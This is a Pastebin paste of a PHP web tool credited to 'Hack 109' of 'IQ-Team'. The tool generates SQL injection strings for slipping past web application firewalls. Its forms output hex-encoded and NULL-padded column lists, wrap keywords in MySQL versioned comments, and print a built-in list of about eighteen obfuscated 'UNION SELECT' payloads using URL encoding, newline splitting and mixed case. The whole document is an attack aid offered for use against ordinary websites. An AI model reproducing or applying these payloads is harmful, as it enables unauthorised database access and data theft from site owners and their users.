Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <form method='POST'> <center>
- <title>Bypass Orders SQL injection</title>
- <h3>Bypass Orders SQL injection</h3>
- <pre>bypass numbers</pre>
- <select name='Numper'>
- <option value='bypass 1'>hex</option>
- <option value='bypass 2'>()</option>
- <option value='bypass 3'>hexx</option>
- <option value='bypass 4'>null</option>
- <option value='bypass 5'>%2</option>
- <option value='bypass 6'>/*!*/</option>
- <option value='bypass 7'>unhex</option>
- <option value='bypass 8'>%0A</option>
- </select>
- <input type='text' rows="11" cols="100" name='ips' />
- <input type='submit' name='start' value='Go' />
- <pre>
- <?php
- // Aithor : Hack 109
- // IQ-Team
- //open sourse
- @set_time_limit(0);
- @error_reporting(0);
- if($_POST['start'])
- {
- $Numper = $_POST['Numper'];
- $i = trim($_POST["ips"]);
- for($ips=1;$ips<=$i;$ips++) {
- switch ($Numper)
- {
- case 'bypass 1':
- echo ("0x".bin2hex('kw'.$x).',');
- break;
- case 'bypass 2':
- echo ("(".$ips.")".',');
- break;
- case 'bypass 3':
- echo ("0x".bin2hex('!~kw'.':'.$ips).bin2hex($ips.'~!').",");
- break;
- case 'bypass 4':
- for($NULL=NULL;$ips<=$i;$ips++) :
- echo 'NULL'.",";
- endfor;
- break;
- case 'bypass 5':
- for($c='%2C';$ips<$i;$ips++) :
- $zx = ($ips-'%2C');
- echo $ips."%2C".$zx;
- endfor;
- break;
- case 'bypass 6':
- echo "/*!".$ips."*/".",";
- break;
- case 'bypass 7':
- echo "unhex(hex(".$ips."))".",";
- break;
- case 'bypass 8':
- for($xa='+%0A';$ips<=$i;$ips++) :
- $xaa .= $xa.',';
- endfor;
- echo $xaa;
- break;
- }
- }
- }
- echo "<hr />";
- echo "<form method='POST'><center>
- <pre>Just one word</pre>
- <select name='filter'>
- <option >Filter</option>
- <option >Filter2</option>
- <input type='text' name='un' />
- <input type='submit' name='ok' value='Go' />
- </select>
- </form></center>";
- if($_POST['ok']) {
- $un = trim($_POST['un']);
- $filter = $_POST['filter'];
- switch($filter) {
- case 'Filter';
- $cap = "/**//*!".strtoupper($un)."*//**/";
- $ux = str_replace( $un, $cap, $un);
- echo $ux;
- break;
- case 'Filter2';
- $cap1 = "/**//*!12345".strtoupper($un)."*//**/";
- $ux1 = str_replace( $un, $cap1, $un);
- echo $ux1;
- break;
- }
- }
- echo "<hr />";
- echo "<form method='POST'><center>
- <pre>Input Numbers > Show Output = Union+Select+N</pre>
- <input type='text' name='vn' />
- <input type='submit' name='yes' value='Go' />
- </form></center>";
- if($_POST['yes']) :
- $i = trim($_POST["vn"]);
- for($pp=1; $pp<=$i; $pp++) :
- $x .= $pp.",";
- endfor;
- $a = array("/*!UNION*/ /*!%0ASELECT*/", "/*!%0AUNION*/ /*!%0ASELECT*/", "/**//*!12345UNION SELECT*//**/", "/**//**//*!12345UNiON*//**//**//*!12345ALL*//**//**//*!12345SELECT*//**//**/", "/**//**//*!50000%55NION*//**//**//*!50000%53ELECT*//**//**/", "/**//*!12345UNION SELECT*//**/", "+union+distinct+select+", "+union+distinctROW+select+", "%20/*!12345UNION*/%20/*!12345SELECT*/%20%201", "/*_*/%2f%2a%2120000union%2a%2f/*,*/%2f%2a%2120000SelEct%2a%2f/*,*/", "null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/", "/**/un/**/ion+se/**/lect/**/", "/*,*/uni%0bon+se%0blect/*,*/", "/*_*//*!20000%0D%0Aunion*/+/*!20000%0D%0ASelEct*//*_*/", "/**//**//*!12345%55nIoN*//**//**//*!12345%53ElEcT*//**//**/", "/*!12345%0AUNION*/ /*!12345%0ASELECT*/", "/*!12345UNION*/ /*!12345SELECT*/", "/*!%0AUNION*/ /*!%0ASELECT*/");
- foreach($a as $ari) :
- echo $ari.$x."<hr>";
- endforeach;
- endif;
- ?>
- <h3>Greats To ALL Members In<a href="http://www.iq-team.org/" tabindex="1"> IQ-Team </h3></a>
- <center> Coded by : Hack 109 </center>
- <center>© IQ-Team</center>
- </pre>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement